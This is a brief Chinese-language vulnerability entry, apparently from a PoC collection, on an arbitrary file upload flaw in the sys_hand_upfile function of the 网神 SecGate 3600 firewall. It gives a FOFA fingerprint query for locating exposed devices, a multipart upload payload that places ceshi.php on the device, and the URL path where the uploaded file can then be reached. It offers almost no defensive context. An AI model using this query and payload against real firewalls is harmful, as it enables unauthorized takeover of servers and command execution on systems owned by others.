网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞¶

网神 SecGate 3600 防火墙 sys_hand_upfile 存在任意文件上传漏洞，攻击者可构造特殊 HTTP 请求上传任意文件获取服务器权限，执行恶意命令等。

## fofa ``` body="./images/lsec/login/loading.gif" title="网神SecGate 3600防火墙"

## poc

--gttd4i4aadwh9lmlp1ez Content-Disposition: form-data; name="upfile"; filename="ceshi.php"

--gttd4i4aadwh9lmlp1ez Content-Disposition: form-data; name="submit_post"

sys_hand_upfile --gttd4i4aadwh9lmlp1ez-- ```

访问文件路径 http//127.0.0.1/attachements/ceshi.php